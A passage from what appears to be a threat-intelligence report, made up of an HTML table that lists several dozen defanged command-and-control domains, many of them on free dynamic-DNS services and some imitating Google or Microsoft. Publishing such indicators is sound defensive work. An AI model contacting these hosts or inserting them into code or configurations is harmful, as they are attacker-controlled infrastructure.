<p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">bab2o25com[.]accesscam[.]org</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">babaji[.]accesscam[.]org</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">babi5599ss[.]ddnsgeek[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">balabalabo[.]mywire[.]org</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">bggs[.]giize[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">bibabo[.]freeddns[.]org</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">binmol[.]webredirect[.]org</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">bioth[.]giize[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">Boemobww[.]ddnsfree[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">brcallletme[.]theworkpc[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">btbtutil[.]theworkpc[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">btltan[.]ooguy[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">camcampkes[.]ddnsfree[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">camsqewivo[.]kozow[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">ccammutom[.]ddnsgeek[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">cdnvmtools[.]theworkpc[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">cloacpae[.]ddnsfree[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">cmwwoods1[.]theworkpc[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">cnrpaslceas[.]freeddns[.]org</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">codemicros12[.]gleeze[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">cressmiss[.]ooguy[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">cvabiasbae[.]ddnsfree[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">cvnoc01da1cjmnftsd[.]accesscam[.]org</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">cvpc01aenusocirem[.]accesscam[.]org</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">cvpc01cgsdfn53hgd[.]giize[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">DCLCWPDTSDCC[.]ddnsfree[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">dlpossie[.]ddnsfree[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">dnsfreedb[.]ddnsfree[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">doboudix1024[.]mywire[.]org</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">evilginx2[.]loseyourip[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">examp1e[.]webredirect[.]org</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">faeelt[.]giize[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">fakjcsaeyhs[.]ddnsfree[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">fasceadvcva3[.]gleeze[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">ffosies2024[.]camdvr[.]org</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">fgdedd1dww[.]gleeze[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">filipinet[.]ddnsgeek[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">freeios[.]theworkpc[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">ftpuser14[.]gleeze[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">ftpzpak[.]kozow[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">globoss[.]kozow[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">gogo2025up[.]ddnsfree[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">googlel[.]gleeze[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">googles[.]accesscam[.]org</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">googles[.]ddnsfree[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">googlett[.]camdvr[.]org</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">googllabwws[.]gleeze[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">gtaldps31c[.]ddnsfree[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">hamkorg[.]kozow[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">honidoo[.]loseyourip[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">huygdr12[.]loseyourip[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">icekancusjhea[.]ddnsgeek[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">idstandsuui[.]kozow[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">indoodchat[.]theworkpc[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">jarvis001[.]freeddns[.]org</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">Kaushalya[.]freeddns[.]org</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">khyes001ndfpnuewdm[.]kozow[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">kskxoscieontrolanel[.]gleeze[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">ksv01sokudwongsj[.]theworkpc[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">lcskiecjj[.]loseyourip[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">lcskiecs[.]ddnsfree[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">losiesca[.]ddnsgeek[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">lps2staging[.]ddnsfree[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">lsls[.]casacam[.]net</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">ltiuys[.]ddnsgeek[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">ltiuys[.]kozow[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">mailsdy[.]gleeze[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">maliclick1[.]ddnsfree[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">mauritasszddb[.]ddnsfree[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">meetls[.]kozow[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">Microsoft[.]bumbleshrimp[.]com</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">ml3[.]freeddns[.]org</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> 